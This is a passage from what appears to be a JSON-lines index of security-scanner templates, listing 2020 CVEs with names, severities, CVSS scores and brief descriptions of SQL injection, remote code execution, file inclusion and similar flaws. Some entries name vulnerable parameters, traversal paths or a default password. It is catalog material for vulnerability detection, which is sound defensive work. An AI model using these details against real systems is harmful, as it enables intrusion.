ajax_officebuilding.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-22210.yaml"} +{"ID":"CVE-2020-22211","Info":{"Name":"74cms - ajax_street.php 'key' SQL Injection","Severity":"critical","Description":"SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-22211.yaml"} +{"ID":"CVE-2020-22840","Info":{"Name":"b2evolution CMS \u003c6.11.6 - Open Redirect","Severity":"medium","Description":"b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-22840.yaml"} +{"ID":"CVE-2020-23015","Info":{"Name":"OPNsense \u003c=20.1.5 - Open Redirect","Severity":"medium","Description":"OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-23015.yaml"} +{"ID":"CVE-2020-23517","Info":{"Name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-23517.yaml"} +{"ID":"CVE-2020-23575","Info":{"Name":"Kyocera Printer d-COPIA253MF - Directory Traversal","Severity":"high","Description":"Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-23575.yaml"} +{"ID":"CVE-2020-23972","Info":{"Name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","Severity":"high","Description":"Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application\nwithout authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type \u0026 name file too double ext.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-23972.yaml"} +{"ID":"CVE-2020-24148","Info":{"Name":"Import XML \u0026 RSS Feeds WordPress Plugin \u003c= 2.0.1 Server-Side Request Forgery","Severity":"critical","Description":"WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2020/CVE-2020-24148.yaml"} +{"ID":"CVE-2020-24186","Info":{"Name":"WordPress wpDiscuz \u003c=7.0.4 - Remote Code Execution","Severity":"critical","Description":"WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2020/CVE-2020-24186.yaml"} +{"ID":"CVE-2020-24223","Info":{"Name":"Mara CMS 7.5 - Cross-Site Scripting","Severity":"medium","Description":"Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-24223.yaml"} +{"ID":"CVE-2020-24312","Info":{"Name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","Severity":"high","Description":"mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-24312.yaml"} +{"ID":"CVE-2020-24391","Info":{"Name":"Mongo-Express - Remote Code Execution","Severity":"critical","Description":"Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-24391.yaml"} +{"ID":"CVE-2020-24550","Info":{"Name":"EpiServer Find \u003c13.2.7 - Open Redirect","Severity":"medium","Description":"EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-24550.yaml"} +{"ID":"CVE-2020-24571","Info":{"Name":"NexusDB \u003c4.50.23 - Local File Inclusion","Severity":"high","Description":"NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-24571.yaml"} +{"ID":"CVE-2020-24579","Info":{"Name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","Severity":"high","Description":"D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-24579.yaml"} +{"ID":"CVE-2020-24589","Info":{"Name":"WSO2 API Manager \u003c=3.1.0 - Blind XML External Entity Injection","Severity":"critical","Description":"WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2020/CVE-2020-24589.yaml"} +{"ID":"CVE-2020-24902","Info":{"Name":"Quixplorer \u003c=2.4.1 - Cross-Site Scripting","Severity":"medium","Description":"Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-24902.yaml"} +{"ID":"CVE-2020-24903","Info":{"Name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","Severity":"medium","Description":"Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-24903.yaml"} +{"ID":"CVE-2020-24912","Info":{"Name":"QCube Cross-Site-Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-24912.yaml"} +{"ID":"CVE-2020-24949","Info":{"Name":"PHP-Fusion 9.03.50 - Remote Code Execution","Severity":"high","Description":"PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-24949.yaml"} +{"ID":"CVE-2020-25078","Info":{"Name":"D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure","Severity":"high","Description":"D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-25078.yaml"} +{"ID":"CVE-2020-25213","Info":{"Name":"WordPress File Manager Plugin - Remote Code Execution","Severity":"critical","Description":"The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-25213.yaml"} +{"ID":"CVE-2020-25223","Info":{"Name":"Sophos UTM Preauth - Remote Code Execution","Severity":"critical","Description":"Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-25223.yaml"} +{"ID":"CVE-2020-25495","Info":{"Name":"Xinuo Openserver 5/6 - Cross-Site scripting","Severity":"medium","Description":"Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-25495.yaml"} +{"ID":"CVE-2020-25506","Info":{"Name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-25506.yaml"} +{"ID":"CVE-2020-2551","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-2551.yaml"} +{"ID":"CVE-2020-25540","Info":{"Name":"ThinkAdmin 6 - Local File Inclusion","Severity":"high","Description":"ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-25540.yaml"} +{"ID":"CVE-2020-25780","Info":{"Name":"Commvault CommCell - Local File Inclusion","Severity":"high","Description":"CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-25780.yaml"} +{"ID":"CVE-2020-25864","Info":{"Name":"HashiCorp Consul/Consul Enterprise \u003c=1.9.4 - Cross-Site Scripting","Severity":"medium","Description":"HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-25864.yaml"} +{"ID":"CVE-2020-26073","Info":{"Name":"Cisco SD-WAN vManage Software - Local File Inclusion","Severity":"high","Description":"Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2020/CVE-2020-26073.yaml"} +{"ID":"CVE-2020-26153","Info":{"Name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","Severity":"medium","Description":"Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-26153.yaml"} +{"ID":"CVE-2020-26214","Info":{"Name":"Alerta \u003c 8.1.0 - Authentication Bypass","Severity":"critical","Description":"Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-26214.yaml"} +{"ID":"CVE-2020-26248","Info":{"Name":"PrestaShop Product Comments \u003c4.2.0 - SQL Injection","Severity":"high","Description":"PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2020/CVE-2020-26248.yaml"} +{"ID":"CVE-2020-26413","Info":{"Name":"Gitlab User enumeration via Graphql API","Severity":"medium","Description":"An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-26413.yaml"} +{"ID":"CVE-2020-26876","Info":{"Name":"WordPress WP Courses Plugin Information Disclosure","Severity":"high","Description":"WordPress WP Courses Plugin \u003c 2.0.29 contains a critical information disclosure which exposes private course videos and materials.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-26876.yaml"} +{"ID":"CVE-2020-26919","Info":{"Name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","Severity":"critical","Description":"NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-26919.yaml"} +{"ID":"CVE-2020-26948","Info":{"Name":"Emby Server Server-Side Request Forgery","Severity":"critical","Description":"Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-26948.yaml"} +{"ID":"CVE-2020-27191","Info":{"Name":"LionWiki \u003c3.2.12 - Local File Inclusion","Severity":"high","Description":"LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-27191.yaml"} +{"ID":"CVE-2020-2733","Info":{"Name":"JD Edwards EnterpriseOne Tools - Admin Password Disclosure","Severity":"critical","Description":"Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-2733.yaml"} +{"ID":"CVE-2020-27361","Info":{"Name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","Severity":"high","Description":"Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-27361.yaml"} +{"ID":"CVE-2020-27467","Info":{"Name":"Processwire CMS \u003c2.7.1 - Local File Inclusion","Severity":"high","Description":"Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-27467.yaml"} +{"ID":"CVE-2020-27735","Info":{"Name":"Wing FTP 6.4.4 - Cross-Site Scripting","Severity":"medium","Description":"Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-27735.yaml"} +{"ID":"CVE-2020-27866","Info":{"Name":"NETGEAR - Authentication Bypass","Severity":"high","Description":"NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-27866.yaml"} +{"ID":"CVE-2020-27982","Info":{"Name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-27982.yaml"} +{"ID":"CVE-2020-27986","Info":{"Name":"SonarQube - Authentication Bypass","Severity":"high","Description":"SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\nSVN, and GitLab credentials via the api/settings/values URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-27986.yaml"} +{"ID":"CVE-2020-28188","Info":{"Name":"TerraMaster TOS - Unauthenticated Remote Command Execution","Severity":"critical","Description":"TerraMaster TOS \u003c= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-28188.yaml"} +{"ID":"CVE-2020-28208","Info":{"Name":"RocketChat Unauthenticated Email enumeration","Severity":"medium","Description":"An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-28208.yaml"} +{"ID":"CVE-2020-28351","Info":{"Name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","Severity":"medium","Description":"Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING\u0026 page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-28351.yaml"} +{"ID":"CVE-2020-28871","Info":{"Name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-28871.yaml"} +{"ID":"CVE-2020-28976","Info":{"Name":"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)","Severity":"medium","Description":"The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-28976.yaml"} +{"ID":"CVE-2020-29164","Info":{"Name":"PacsOne Server \u003c7.1.1 - Cross-Site Scripting","Severity":"medium","Description":"PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-29164.yaml"} +{"ID":"CVE-2020-29227","Info":{"Name":"Car Rental Management System 1.0 - Local File Inclusion","Severity":"critical","Description":"Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the \"page\" parameter, leading to code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-29227.yaml"} +{"ID":"CVE-2020-29284","Info":{"Name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-29284.yaml"} +{"ID":"CVE-2020-29395","Info":{"Name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-29395.yaml"} +{"ID":"CVE-2020-29453","Info":{"Name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","Severity":"medium","Description":"The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-29453.yaml"} +{"ID":"CVE-2020-29597","Info":{"Name":"IncomCMS 2.0 - Arbitrary File Upload","Severity":"critical","Description":"IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-29597.yaml"} +{"ID":"CVE-2020-3187","Info":{"Name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","Severity":"critical","Description":"Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2020/CVE-2020-3187.yaml"} +{"ID":"CVE-2020-3452","Info":{"Name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","Severity":"high","Description":"Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-3452.yaml"} +{"ID":"CVE-2020-35234","Info":{"Name":"SMTP WP Plugin Directory Listing","Severity":"high","Description":"The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-35234.yaml"} +{"ID":"CVE-2020-35338","Info":{"Name":"Wireless Multiplex Terminal Playout Server \u003c=20.2.8 - Default Credential Detection","Severity":"critical","Description":"Wireless Multiplex Terminal Playout Server \u003c=20.2.8 has a default account with a password of pokon available via its web administrative interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35338.yaml"} +{"ID":"CVE-2020-35476","Info":{"Name":"OpenTSDB \u003c= 2.4.0 - Remote Code Execution","Severity":"critical","Description":"OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35476.yaml"} +{"ID":"CVE-2020-35489","Info":{"Name":"WordPress Contact Form 7 - Unrestricted File Upload","Severity":"critical","Description":"WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2020/CVE-2020-35489.yaml"} +{"ID":"CVE-2020-35580","Info":{"Name":"SearchBlox \u003c9.2.2 - Local File Inclusion","Severity":"high","Description":"SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-35580.yaml"} +{"ID":"CVE-2020-35598","Info":{"Name":"Advanced Comment System 1.0 - Local File Inclusion","Severity":"high","Description":"ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-35598.yaml"} +{"ID":"CVE-2020-35713","Info":{"Name":"Belkin Linksys RE6500 \u003c1.0.012.001 - Remote Command Execution","Severity":"critical","Description":"Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35713.yaml"} +{"ID":"CVE-2020-35729","Info":{"Name":"Klog Server \u003c=2.41 - Unauthenticated Command Injection","Severity":"critical","Description":"Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35729.yaml"} +{"ID":"CVE-2020-35736","Info":{"Name":"GateOne 1.1 - Local File Inclusion","Severity":"high","Description":"GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-35736.yaml"} +{"ID":"CVE-2020-35749","Info":{"Name":"WordPress Simple Job Board \u003c2.9.4 - Local File Inclusion","Severity":"high","Description":"WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.","Classification":{"CVSSScore":"7.7"}},"file_path":"cves/2020/CVE-2020-35749.yaml"} +{"ID":"CVE-2020-35774","Info":{"Name":"twitter-server Cross-Site Scripting","Severity":"medium","Description":"twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2020/CVE-2020-35774.yaml"} +{"ID":"CVE-2020-3580","Info":{"Name":"Cisco ASA/FTD Software - Cross-Site Scripting","Severity":"medium","Description":"Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-3580.yaml"} +{"ID":"CVE-2020-35846","Info":{"Name":"Agentejo Cockpit \u003c 0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35846.yaml"} +{"ID":"CVE-2020-35847","Info":{"Name":"Agentejo Cockpit \u003c0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35847.yaml"} +{"ID":"CVE-2020-35848","Info":{"Name":"Agentejo Cockpit \u003c0.12.0 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-35848.yaml"} +{"ID":"CVE-2020-35951","Info":{"Name":"Wordpress Quiz and Survey Master \u003c7.0.1 - Arbitrary File Deletion","Severity":"critical","Description":"Wordpress Quiz and Survey Master \u003c7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).","Classification":{"CVSSScore":"9.9"}},"file_path":"cves/2020/CVE-2020-35951.yaml"} +{"ID":"CVE-2020-36112","Info":{"Name":"CSE Bookstore 1.0 - SQL Injection","Severity":"critical","Description":"CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-36112.yaml"} +{"ID":"CVE-2020-36289","Info":{"Name":"Atlassian Jira Unauth User Enumeration","Severity":"medium","Description":"Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 